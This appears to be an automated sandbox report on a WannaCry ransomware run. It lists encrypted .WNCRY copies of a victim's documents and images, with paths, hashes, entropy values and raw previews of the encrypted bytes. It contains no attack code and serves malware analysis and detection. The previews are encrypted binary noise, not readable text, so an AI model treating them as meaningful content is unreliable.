                                                  SHA-512:F05A551E297ADE8012D3E5916FE308D7C986E8ED259B7720BE947651AA7F1A3819DA1FB72523E815EDAAF2E804B482836AAF4FC55E655038E4185C852074C33D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....?..Q...........d2...q\...C.+.b1k.....W..-...u|...\..^.*K..(...i....F...)...7.S...;..W.....N.......2^P..ss..:|..O.....-V.n...>.J.h..(....`.P......G".....,..@b...m..m...........E>y...?.N....V...R......n...If....h %M...O.!....g..Z.D~i.A..b\'...r%..............o..:...R7.....2.g.2z?....2f;.cT...rr..,g........d..%(.4.)e....z.fg...q...P.=cf..r.[d.....f..4b..e....N.#?..\.J....\K}^....b1>.>X...1/..b]..p.j.X.A..$..m......v...wP..(.z.m.V.> <.7$`)....+...L.......#......Y.2..}.b.F2.}.. .(........ ..Jx..s...%.y.f.'..z~O.."..*.[wR.Je..{sa.t..uS;..":k.b....$.\......r......&....=.S..Q.!..9....k.k4.[.c...;...r...M..&.(y..1)R.e....3*. .,.=G....<-C6..f]..B...f...&S..+....$.#..d..B.~.z{.)....A2.9.B......i*~ak.{t.b.'?{;..*.&.<.j@.)~.9.sT.w.5....._.qL].K.:.[."".y.6od.J..Y]./=...-..+y(C7.j.U...Cc.W...M.6.-.^...8T7..k..E......C%k....P.J.}.~'..-Qv.E.....{...| ..I.cI...n.1...4........4...vlF.d.50.+]|P.............(.3uv=....Q.pq_.-F. .w.R...'5.{f./..4y.*

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\WHZAGPPPLA.xlsx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.85417753979318
                                                  Encrypted:false
                                                  SSDEEP:24:bk1P06vx0Hykr/WgeHuxfFykadxzkJlkgR2RbYFeTynNtTUD5GnXIsnroP/kqf0n:bk1P0e0HdWBHm1adlk3dR2hYFKOYlGXZ
                                                  MD5:9DE02CC60589F34A4B96FEFCD9909704
                                                  SHA1:66FC1CE161EB8DCC1954AD149DF3CB3471B6354E
                                                  SHA-256:FAF1DF84986305E9644CC78C56FBEEE75261D737996D1584A5272AFAC966AB44
                                                  SHA-512:79BB02E6F15325F98311655B6E9E711DCAAAD68A0B5B7ED1E263CF0EF08A820F6C33D14170B773D5947B6A4A341BF9BDDAB2CB6D9633D2851EF1B5C4F0651C2A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!...... 6.....)C#Y.2o..A...t=AFU.Lf..`..............@A..@..0,DU....2.(..X{.N.C........l.P.{.+c...t...Z........Ew1,.m{b..j.............B_..^....."..../.P.F....>+.JB..}=..1.U]......O.....q....07..Y.|-.iu.n{.knqMh.......%.t4.MK.`..0.$".t_.o6..*N...?..............O..$P.q.@?...@zu.D..*W..........!.6i...T....a'.Z[....5....{.D....|.gf.O.Z.i...bW.......v.E....k9TP.C.<..Y.-..+?.....`...u~.U.T#J.5-.I....C......?...........^.}.K.\.....H.t..i..>J....._..N.}.N@...( :.Ht..`.O.P..a...?mM.R..K~.@....;.HJ....|.........i.'..o.'J.k..R[<..U.I..8&.hc.O.y6....<....t.....j?W......XJ....X..d.<...=..vEy....6$op...".......K...#.[..:.[-..M.S.t......A.x..\.6....Fx.f...r.L......./.....U.<.Zi.g.u.n,..0....o8..Q.n...:..[...,.......kz..@.........Vy!7.w[..S.h.Y.%..B...H..n....`.@5....!Vw[.QH.zT....HY.....?.I.m....=*.m%..lL.l.:.T..*,..B_1"....D.[..!X...ki.5v....oW.@.0..F...........r......PLx..\.*..K...LU.M... .....'...;..V.+.....7@..g.H.......]..9..r.Y....e

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\ZQIXMVQGAH.docx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.830720891656247
                                                  Encrypted:false
                                                  SSDEEP:24:bkK2HqT70oYVZz7LsLKWrv0lm1ZbyYYqc94zGcwcDHYiIQ76KsH4okdE3:bkK2HqTAoYVmOWrvjZWfraxp2KDoF3
                                                  MD5:30CFA429B724F2B7A17E4915AA7FE6A2
                                                  SHA1:ABE7695E0E4E7C3D66F0D98073A69296BE6D8A60
                                                  SHA-256:09461963138E6C9693507F856D1F2232FFAC66DABA8755131089C9FAC14C4A69
                                                  SHA-512:40142FEABA30525A9568F52C1228F2A3E7D3D6DBC455976114A377462600039C1D5436BF54B74710641DE9DF6EC46A3D6ED39629DC0371B1BEF3D4065EDB1800
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....J.~.]B..N.^.......g..x..........TG....l..(..4.+......#.Y..Q.z9.D.-.-...Q...6DM..].O.3...$.6..[...{D.Ef.:B..<..Lx...].D..V]]i..g..J.3e.Y......R.$..G,.UB....TY9....u.I.7>v.8UAbC&X.R.1...{>H{.Q.&.q..I...... C.n$U. E..l^bH....J....Rq.}j.|../1D.....8............V..N......u ....mbt...c....V..u...J...K..f\e....&.HP..C...D.C.,-...y.}`.E{M.ZqN.x.?. `./.8~..\qH26.[h.I...X+.>..YTr..W.M.!.>T.......bN>;.....T+o*.]....5....2.I..=J.Q.M....-.L]k..........,G..}*.....V7....1h..sa.D...6.H... .U.l._C.J7.1..E..Ps..D.......|}......WI.")V.'.:.TH...|}..B..k4.g.{.J.I"(F..]l7.K......oY#..c.$P...Pj....=...f..~+....$.m.........o.Q.F.._.].5...I0.[.c..4x...o$)c.S.ld.:gzs.{.4.1.....~....5..Prex`o..{. ....m...._Be.L........)...H...!..B...d...........5........U.'&.......?.iTy!k......x.I./1-.sm.bx....B....~v.$...iQ..:...by..........:.....!].l..C.#.`\iQ&B..,.e.Q.C4r.*HkC..'\...C.....:XV..zU..aTz.8...T.y......B.WM....(}>(^PnCt....EH.(....;.._.<|%"..2..{j.e..

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\ZQIXMVQGAH.xlsx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.851181274244945
                                                  Encrypted:false
                                                  SSDEEP:24:bkHvca231YjsDIvaSFS/5WbXpke8O6Pts5bAYBzfmanpoeNhE2q3LE:bkPl02aSU/5yXue8O6PaAYBLmanTNy2F
                                                  MD5:5F3FAE3B5BF3DCFA708D912ABF8A65F6
                                                  SHA1:CC459E124F2DFD4583D9E705BFD3030459A82FB1
                                                  SHA-256:BC1B3544DE3234DE2A3D6E31BEBCA05E526161E42859F4B0CA6E63F6FAA970A9
                                                  SHA-512:516792BD1350494392AD9850DD448DC9439C8007BB345B09A7E2CB20832D35A4DD6128A66FCB324F93D8212439128C48A5AAF4AB00078938022B6160B06DAEC6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....;...`.[...aA..gNf..r.l.Ik.q.....:....=.A.J....f....,.\Dj/..&7j..c....i......S.dR..[hw.&.........(.+.'.... )[.i.@...^U......J.$ZCr:9..Fo.,.......-5.W..1Z....7.....L..Px..q(.l#.......`M....o..?.;...A...J.Vc.YW,.&.....k.I5Y..(K...9.(.|..!'v.g{............r...k.]..W..H.k..<..9_.I..7...5t....s.R.....sz..'C6GD....H...Y..1.1+|%. ..+.......Eh."..R......fZ/.25f.~c...d..).I.f /.....e.F.{y..]F......K..b..yv.....k!....}.....T..`....r_Z.. ....-s. ..N.}....g......_.#z .h7.w....t;.......M...n@5IoN.U.<......K..9.l.\.p.}E....t.~m..G..,?....I..,..<..).>tG#?...v.;..V.96.0.n.N_.i....2.....2...K..d8...m.%.....U.>...2...r......Ea....X..!.sJM.k?.n$.}-~...Gdgd..C...R..:. .x..c......i..u..w{4..K$H....%......T..~.Q..@1.....L..p..T..+U.O...M.....t.....d....h....+........u.........n5....Kl'`FCJ.....{...I.yo.5.....N.5).. ....h.SnCf...\.....nR....[...z9..0........l.a..p...J..:....K..@.7!..*2sC.R..>...,.j..Qi..L.'m......\....".X..z..Xm..x4.y..I..=....*^

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1024_768_POS4.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):40984
                                                  Entropy (8bit):7.995961555041992
                                                  Encrypted:true
                                                  SSDEEP:768:R2DHMq1UyyLSuyyYTaN4xAG2SzUh3Dk1iVT2cNI3jZ751SrvKsG+UpOa:Ry+ynuCLAG7zgDkwVq6Il5mKGU8a
                                                  MD5:1ED97896B32C5C409416B7202CFD7F5D
                                                  SHA1:B4F142469B7CD386E93A478C6A69BE72E4D4C660
                                                  SHA-256:90BD07713B1A2F137C6F4FCAE1BEA441272F547E8F02D8541C020A7F7431866E
                                                  SHA-512:99ACA26B05649D41C6D9E55C3F97241D172F700639CCF4B3D52A252D9673061217489F05945FE31FD846D0586A5141370967DA9EA7AF2E7BF57441FF1D7F8767
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....e...m1.. 3W%.g..w..P..yZ.....o...Z..[........Oy.aD7.I.I.^..s... ..GIHv../.7..Y.....N...!..:v...Y.......XOl-.D.X0u.c.!..i.......D.G..n..o.%.3.2....* L?=gD?..W-%.t+i[EG...-.."..e........L8.......Z.Z,h.t4$...<Jr.C...f^.0@.p^.B..-aD.M-..s.....]Al............Z.@.J]x...5..s}p*uH..........Z........HnPY.........}Z..o..q...%\&....I1...F..y.,0..?...?x.B..?*...|+.V..0\,..X...C....&)..4..G.U..9s..eZ...B..w.:X ....m....'.b....0.+p.b.5..9...&...V.w._..._...y=.,........P..6h.]...?.B+Cb4f....C.+"`.(...[....m............._|.}I3#...5|...g...........[..%SXxE..zd....F..s$.9MgJ...Y..~. C..`.W.s.=.T.a..k..t..zJ5L-..u.1..j..].._;3.Z......N........_.........#..|...+ ....v.ol.....p..m.....=.gg.......V.Uv...........f.....;.c.4,.EC....{~.....&.:.<k.."E.zE....0x....J..Eai.....Z/".H......;6.;.Lo....{..U.}..-G.........f-..Y..n...........V......m.O....=q.`.`Az....IM..h{D.{.[r.<.._.B/r.3....A]6!A.z......;......?%.e|3$....k_.6'.....mO.m.P../n.}..$OKo8

                                                  C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1080_POS4.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):125288
                                                  Entropy (8bit):7.998501210566462
                                                  Encrypted:true
                                                  SSDEEP:3072:gxvn3hCJfILYLKPip9Jcth/l6vBJ9S66svgUnkF/f487+h:gxv3QfS2K6p98AH9SR63klv+h
                                                  MD5:3A22A7250F745E7029FC4557729D2673
                                                  SHA1:8DC231AD5463B486D7D807F194A578156C42F08D
                                                  SHA-256:985E8BBB3A798817B2065AA07F41CCADC642A51F59D85E2CFB98CA98BB380B83
                                                  SHA-512:ED8C5FB6D3B42727BE19711D37FF5D9781C051B4B7E53C0287E6BCFEBD3FD4BDEB01266F07F555B42F9215BFB5024FEE74A1DDF9F0F0E3B78F1418A9C33DEF41
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......'.,..1C....t..$.E. ...Mo....}@.=...\..6..qE....._.....[.g}@@$}.F..%-?....$.D8...M4.u......={I.k..)...ZY-......#.+n.^.Y.c.........F. }..i..)W..sd..'.C.oM...u..*..K....*[.k.gm....F..6...G.V.p..w......#F.!...y.3..a0.>O..S.!...X.?...Xe...}....D..........9....z.$.MF. .|.....Q|:...Gc..g..5...0]<...q...y.tm..C..a[.....Bw....R......8................R....R.q..i......_.2.....=.2....9....%6.5..,@..5f..>d.%]j"...1..c...2.....C..m...4.t..f/.P..t.*..........C&a.@.L......H`../.e.W.8.V..q;{r..j.....V......U.&..o....y.../fG...v2.)AZ. ......t .7. .cp..>-.).e;..W.q!...v..b92C.]"dF....^^...o.b../......8.4...=]@.$..&@gZfF.....i....q..v"j.&b....){....#'.s.w.+.Q<..R.{E.)l....N..*R..%....v......8.>......g.`.Uc@h...P.{T;.2..r....2c7`..h-.... (@3..1..H.$..K..y..sM/B3CV..r..x...+.L....I......!. ...2.8[........C..%......:[.Y.....s..m.$uT.<F.#..A.7^..P.....(.7.>y.*....Z.....o.|.[.I..5y..8.....m.L.@....o.[..Q.....$...i.b9..7Q&.*h.:.y!..).Vh

                                                  C:\Documents and Settings\user\Downloads\BNAGMGSPLO.pdf.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.856430237778002
                                                  Encrypted:false
                                                  SSDEEP:24:bkiAAB+k2Ubc0pxPfsishYAFPCpMMZwb2KtjB9TEDUjubz49cZDL0DjjM:bkiAyp2UbhpxXsiqxCphk2QTEIJcJ5
                                                  MD5:4F336418442A64242CF5B8132DBA0CE4
                                                  SHA1:598EB1DF085451B0048E9568D0DDE2AC9D5640D5
                                                  SHA-256:C7B6E058B3F904D7163226603ABD6EA9061F2E1296FE405F8E10798B81CD6AC7
                                                  SHA-512:E0061EBF4A9A902F900FB18AC4234A1CC7AEE6F841ECF869E83DE5A6F5B025B404C33CB1F3B8D0F5A173455BF397DDCAF2E2790CB16D28AE0416DB7A89FF8E8A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......!."..................u:.......4"..N[d...........5?.yP...~.cU.hq....J....K.".+.n[.@.:.......>...u...w.5........(~..~..V..%...x...}.4...U.E9...>.gxYlYF-.g......._..@..\Q.s..\$.|....L.V......*.1.....$.;.......w....p[.o......!0.......Y..y.0.v................Gx.......U.......'h/..m&.Q.U..[v..#,Al..@x){.~....(..N.X..Hx.L...nAw.(.vnlV..T.h...Es....u.7.$.0...4.u..x?g.j.`R+6..7uE...r.(.?..r.%.....8..<Z.P[0A*.@...yo`.=,Sf.s.|G;.@....f.....0.......*]7.......f...j.~.a...<`.V......e.0.f....=..h:..;....#.D/....5...%.2HJ..../$.W.-nVE.....l4.S9..6DO.(?P.w....N.?....z.Cs.+.."..0.@...a..Z..@...L..N..7.h...r.U.A...sw..}..mR.M.EVn..Af..&.uA....$....g.....h/.L.WL..QM...g..Yt.........N...`.R.f.3...bB..iI~.Q.d...U`...^(.B..75M.%.ug`..M.]....T..l..y`.n..H...L%.b.n.'......k....A.C.'X).TO..0GL.d4n.......*...........8..n.".z._.=~.. .....P.."....9.-X.Wn...#^e...\.^;..0j.......i.<.,...$..\B..NA..<Jv".m`,...B......t.t....4..r._.*N..#...u.z..nm:..:..

                                                  C:\Documents and Settings\user\Downloads\GAOBCVIQIJ.docx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.811984123982203
                                                  Encrypted:false
                                                  SSDEEP:24:bkgb8G4xpn9zA200t9gkw4ldRuCBF9YMjJB30ALrbUMldkZUH:bkgb8GcndD0UKSBFK+JZBhgZUH
                                                  MD5:0516F42417A3F04C707ADAC115D2CF00
                                                  SHA1:A2648753C15BDDD23118709F0A98E77709289901
                                                  SHA-256:22106308BA259C60ED8B1740E7C37EA52105D84EF624C32AADD1E6FF91DE4FD1
                                                  SHA-512:A501E083458624AAF15DF7CC4F77EFDD63AF45FA4A4B16CCC2810092F73339327A6A36D5B4EC50510130D787A90D3BA7A1515B2022628E87FF0883826DDF0E72
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....M._.H.5t._..e..O.n...mZ..9..4.....\v.<..{.2.fL..z|..?.k...D...R:...E.. .O-%.^#r...Rk.W..'....n..Q.%E.v...;."......4.......h$...?3i.v..)...R..:....B....=J.....n...G.!..%.t.....F.V...;*..{....D.7yL.H.<r.r....|.V6H..`j.+..Tz....wS.'F.p.F...,..[...............".8_.O.Z.].z.L7.V..H.;....?uPb..U?...g.5.W..;..u}D.7.,D..,....Q.n..e.@..g{.....A.vs.Q5S(a...)!..&_.e.........Q...e?..;/.l.&.).%.o.!,b...i...^sS..A.m.....L...0..........&...|....../....A<O.H...Q}.;5pA5.'.....V'?O.........M..]d)...S".v.f.r...Y.........Y..9<.%B.fZ.e.\.:.....[].w..<,.(LC....}^..v...5.......#QtA........{$.y....4K....'.....g.q..G?^A....6zf1.a.).q..#}.(..z....i...SR.m.:.y..=.@tqYM.f%j..c~.q@<|.WI.F....%=D.......6N.C..E..3wY...v.IB..|f...Kf......W?.0.....J..S.n$....+j]......g......;....n.Rw...x.KB......O..........6.5..X...fI.!AzgsML...x....y..s.h..qh.W_...;.k...a.qe.Y9..m....4,.@....u..*....].[o.<..J...$.........%bo|a.dd..$y$.Q.wO.5..qh.RfHB,.I..,.U..f......)..l...bYw..jE.....O.

                                                  C:\Documents and Settings\user\Downloads\GAOBCVIQIJ.pdf.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.807958225155772
                                                  Encrypted:false
                                                  SSDEEP:24:bkP8tAzxbR0GDwisZvcYFCqTlX3uLTsMHPce6AZfqq2L1dHFaQToGEa8sTGcBObx:bkPWWbRHEl5X3P9iiL1d7ToGYm1mFrYm
                                                  MD5:5990554E5D93E2EFF0010F63A6C14086
                                                  SHA1:29E15061889B84D3DEB0F0D9BD833A4D8C321EAD
                                                  SHA-256:05B9FFFACD13D204A3AF9CCCECA1E3EFCA7CA5714208177880ABFAE7A45E0D37
                                                  SHA-512:6D202CED87AE35540CE3201BC56B637C8914DFA866FB57143A656D716261871AF5A85E977C2EF45D5A298D74F9431C1AD36E4C144A82965DF0FDAF5AC123F40D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......^?A......K'..F-....n.ZM..6.$.9.I.3.H.......N........ek...:.q-%......9.&P..@H..m4..U....H......P....!L I.........eV..pNh.V.Pc.IAO......AT......Nf.Y...l.8...'...;%...(.y..h..].=..n..kn..R#o.Dx...L.A.9..*k.....-..h.....X..49....t.y..9Y.<.M.^............|....Bu.S...l.L..>.w.<..W.Mq..iN../d..y......*.3....[u.....n4.~..~(_..{./V.W..v.[S...1..qR.D.Y..(.y$..$.~i.;._....+...g_.5.?...5.8.Ka.+......2i0e..@.F.....x*...[:!:.........Y6. ..A.Si.?..Y..jP..V'U.l.QB1..J6.\K. .$Y?.......rs.&P.+d.W.r.#u.Q..2.Y.l.x7.r[>.1..._B.(<U.....h......^<..xa...Y.1.!Q.M.>...u...|..[.....pm9.w.7.ph.Y.0...9M......^[.k..,....#...)b.|.....G..]{.P.....9oQ.P..ANX..nH.u.e.&._4i.. ..o...t.....G.6!.N.f.4.t.&4..1...-.....2..]..S.M1\J\=.>.3^..B..oH\....R..>.w..}1...;..P.B.l.S.V.7........._.0NW.#.T.<N}..M.[.....=.'....L.Q.....#...yTq...,md.r9=Jm..2....G...bz...@y.(.:...m.B*7....M9.Me..5;|r'..9#.Ad......K.7...tO|].-..8:..A..X.B.9.W..4B.P..*Pq.g.F.kO..:..]....*x..P9R...[a

                                                  C:\Documents and Settings\user\Downloads\LSBIHQFDVT.docx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.838863709126363
                                                  Encrypted:false
                                                  SSDEEP:24:bkVTf9A43k6VFre5gwGAKTuiykkvwXJ3RH95nyI6d8WuZ01ScumJRWXM1+QONvk:bkVTfbVVofKiaWwXT9udtl1EmnIM0fs
                                                  MD5:C2F6D5CF81F0ABE8F428E756F86F8C88
                                                  SHA1:0AC22974AD496109A795DF1E873BCD2B103581CC
                                                  SHA-256:7BFC58D74823893F67449E94F08E51F9FFF3883C0F1630466E4A2456E7726A92
                                                  SHA-512:981F7F35715B2F603FA36F121AF6275D8A78B6F31AF7BCD830E54DC6C583881EDFBDD5E48E65E295C9440A0E4B081E37481A32C21F1E695C2B81BBD2C29DD924
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....}>X.q!.:...*.2UQ2.2h.Ge&.!..6R...i~Q;t.^.I...n.p...)..L$o......z.f...R38\.u..F.a^..b.............&..G...:.l.a...rs...}.n..$X....{M..:(S6U;..x.+U.$......Vf.h.ME..-.....q..gW..}..;d..'...!>'.....D....h.N.9b.}...u{.U.GQ...p..B..,..L?.r..q..M.c...H'O................rD.|AY..5X..S.M..|U.'....6..>...C\,......p..R(`....B..u.b.....6.....0z%....g....I......S... ..3.$..... .......W&..!..........]...Jd9...._.S..HR......7g.?.y.Br.....5.!..XZg..a.4...d{..*O..,.......K.E<CA1.M-.j.*Q..sQ.H..rJ.B.'.....H.S.i.)*....4.V...?%E_+.p..o07=A....k......<........t..jtW...j....Uf....Q.......l.7%Y.nD..:.uv...i.@K<eG5Hg.........ne...x("..&z..:0.9 .Zz...3mT...; ....ob. .y.K.qA...:...6;..$...D..a.k.}..c.p..3~.9..H...R..............}..K.<z.y...Y...E`.%U#....nZ.d."O....6O.k....26_.$.T.(..yexQ..."...vW'W..$...k.+..[...........5..v:*w.O...Ef2v%..h.3....<._.o..(..y..iS...=n..%}..@]..Pt...L......kG...6.np.R.rV....#.........x..{.1..D.f67..4.n......R.C..8....3."4".B....OW

                                                  C:\Documents and Settings\user\Downloads\NVWZAPQSQL.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.849975900566908
                                                  Encrypted:false
                                                  SSDEEP:24:bk3HRjpNVkFVQAGBG+eBnY6TPkHo0Kxr36Pkhk8F2T6sMNq1fD+6OajcPWlrG:bk3HpUG3eB9PkIVK8F2skfD+6Oajc+pG
                                                  MD5:6FF350E132C197D96B4366EC38BB6D36
                                                  SHA1:804880245B4A194BFBC341629EB08CAC4260CCAF
                                                  SHA-256:8F8CE9A8B0C444D7CA452F6E5C235AADDA9AB988FB949220FD131B2056EFBF6E
                                                  SHA-512:560E8596410B39697B57145CFFF3D8184E995A9A64F8C9B4ED1F17B673BF52266630BEF74858907E5F803C103983F7A48A4C87B3D4ED48B9DE37516F1EDF3A50
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....Z.%.h..0s......Pr.m.t?;`#m.....J...z....W.>P|a#>k.)#.5..........A...#.z0U.Ki.Z....,.....U4.b..-.....U.........&.......C'.A...... 7..Z.8...........I.w.Wcf...-.O..(;......1&...;.VpX9..\gQ..)..$.K.....C<a..G.....Pu.....(.]...S..[.x.....T..i.-.............0......R.}..U..aB....H..a.6?..%. ..5..O..%|.8.Ph....D.wx.....j......x......txF}..[-......H.n.}.u.r..k=U.)y|........g:........,(.V....H..'TL.|...3*.\}..'..v...E....9..*.).Bl.>T.....r..t..M2A.k3..wa.a..'..-n@.c...S..%x.H.4.s)K...;.AgI{.`c2.?U?....;h..S..G@.....>]e-%g.Q..".eb........s.n.....{.K.x..x.....a..."1/.6...o.....`b.........j../..y ..j.r..O.a.0....5h...%l.P..HRD..!.... D......{....d.."E.v{.;..Z..B..(j.....xa...........>~0.,9r......y..*...$X*...[.....:.{-.^.....O..9V..........R[...'zY.....$.c..?..F.....".q.$F.....nC..b5.%1>.#5S4.".y....s.F;v...s.$..rzF....'#*..+z..C.TZ..^o..km..iw=...3....7....*1=..:.<.F. ...n..e).O'\...+k..,......2./idX/._.2.Ua.F..}sG.w.......7.V.JK.5

                                                  C:\Documents and Settings\user\Downloads\PIVFAGEAAV.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.834222334168714
                                                  Encrypted:false
                                                  SSDEEP:24:bkSnTOXUBJyVzx77mPm3P/DdHwBjNirXoABykIYApQSDjUdrfKQBWnRw1O8:bkS8YJAx77f3P/DdK5iLTB3IYAGSDjUb
                                                  MD5:C9154BF36E9E7894034124BBF7112FF1
                                                  SHA1:4C91FDD1BE911E31974BDB22B37899EBB2D84A6A
                                                  SHA-256:74759CC05AFB8285B3022CAA7C46A9B492EC5DCA8FC4127F3724400140A0BCED
                                                  SHA-512:BB4630FB5412874BF01FC50E4EB1759375A83F34A4816B68036AC744F0444302F0D58E5426D3EFA74EAF6CF3B34E6ED9FD1BCEF067D3235530E278BC57845D89
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....O..5.._.`r.b...a..VA.Hb.R5..*.B.-.......wpN......."sn.}LF&|...5..fi.... ..*^.8......,n...N.t...BX..=...IN.t|......!S .\..D.rBi..+.K.4......6.h..Z..R.K.O...H..&*..x..Z,)..5fY...c...}1}...cXkj.....+.....M....kx....E..2NA...T...}....8(1|.-%...&.H.U.O..............e.\.h.A...i.F ....c.s.5*.s.D........;slF.U"pP..wK..4..o..H.Uv]..f4 ..Qz./.L.I..XAa.,..'.........[...5..&_T...O.{&.*ZD.....m...h.K.w.....iy....0.1>N....a..d.......N.^.!mh...6.M..H5...y.9-..F...[..3.v...Z.......D..n...........2.0@VN......s.h:..}.QOq......@N.1......Vg.\S.,{34jSO..M...lK.5..Me....../R_.v.0^..I;...c.c.TG....4.A..u...f.a."....$.m.9......@./...unQ"..l..RH.....0.g...((gx.E|.F.....]..N../..r....A9...I(..d.X.(...E]..\Kk.N...[....o......4.j.A.j.G....V...#*s.Q.n]...e-.......7.K.HP5}?.r.=..:..4r..bm......n..m'..Up#.J...XN..n.H`].^\.fI!.%.....<..........y.......u.D...u..'O..(.s...:..yX......t..[N.R.....^]O,R!....F.Yt..ctS.......!...y].R.....US..........ZM<..j..u...^.}

                                                  C:\Documents and Settings\user\Downloads\PWCCAWLGRE.pdf.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8367109529083745
                                                  Encrypted:false
                                                  SSDEEP:24:bkm5hqfyh5CLtcXK0DPPWIwZD2zMq7jWe/sxJIXM3yRgpmjEw1QWR8Ge0XdrUjqq:bkkhqKmLWXKLDZD2Iq2e/sxJnyRgpwrk
                                                  MD5:5CF8BCD8E877DCD18344EE071EFA9988
                                                  SHA1:BE06FABCF53D7EA705E1219D008951F0BEB388D3
                                                  SHA-256:6603DCE04A70E2EF5596987085E637E85B829FCDD371C7E8A6F95E6C4C98BD52
                                                  SHA-512:F3DF8AB413A876BFEE7F5C1FB136D3E9F56762DCBD1E386E5251C24AD0352CB12CDF6BDE4090E6130D73611C1B2FCA340230F81D22B48A2B085788CCED861FF4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....s....q.D`{..`4`.P.nR8...D.X.m.......5T..E.z."..zpZ...%.EP.0...._..k..X.6.K.']k...GF...N..^J+.d...^.R.d.j.J....Y.+.J.M.J.A.i...x.o.7......RA...x...[.Z..T].z...VY.N..K....tl......%.i.|.....Qc..`..F..z:).o-.pn..9..e..EY.....@p.......A.Yf.$.B$.+.L.............../f. ......S.t...>....].s..M..r...lSo...@...7Z#W...k.....M.6.-[..:P.M.8.......|E@...a.O.m..S?.....om........[..s..."-.~...>oh_]/.G...u......5se..'=J'.I.b= ....\.t.7.%...8..x&vf..iR.'.L.B..Z.a.O......+q".1.Y.z...|g...q..d.AN)}..*'~G.._{f}.!d.Jz.....M.b.z.U$.U.|a.$.vF...A..+.........P......v.&wu.:3.;n......H....3.u.y.....F7:..Fw"-..?..^Ug..x.J ]!..S.0-1.G..xJ...w...W.D,.....#*.).."......+...>1%z..,`G..VC..c......iV......V..G...a...Q..M.:F:...Y=...m...6..;....;.m.....&...[u.......z....-.Hs....<....5......^..$.PC...,7G)%q.o}H.....V.GI..Q.{..}].$....M.~...Hw#.y......k&5...&I.W%...c...L..a,mM..f/.............g.}...@..:D......FHm.....<.r..R.....4..f.../.....&D...6O9i. .Z.......o.q$..a`1.

                                                  C:\Documents and Settings\user\Downloads\PWCCAWLGRE.xlsx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.823267939487966
                                                  Encrypted:false
                                                  SSDEEP:24:bk8zT1/wypS9agmTpMJUfxaZHCSAVKNuqPJSQ7XMNm12QbovcHiUz9R2Us:bk8zptpSELgyxaZfQK8mIg12/vyiM27
                                                  MD5:525A0649FEF34B4F81E6DB06A6FF4CDC
                                                  SHA1:DC187C9457E2ED4B53676F31205FDE169B84D6C4
                                                  SHA-256:65173F594FCDDE2297F5315B9358A6E0B55C6913DCDD489E859D594836E9B769
                                                  SHA-512:3635C9F801AA9F1D5FE8930960896356105D43DC8B9F3D7B12D6AD644CE713B5EB641DB8E458B6335F56D8F8F6E68416360633642320CC5CC2A3163B5EBD084F
                                                  Malicious:false
                                                  Reputation:unknown
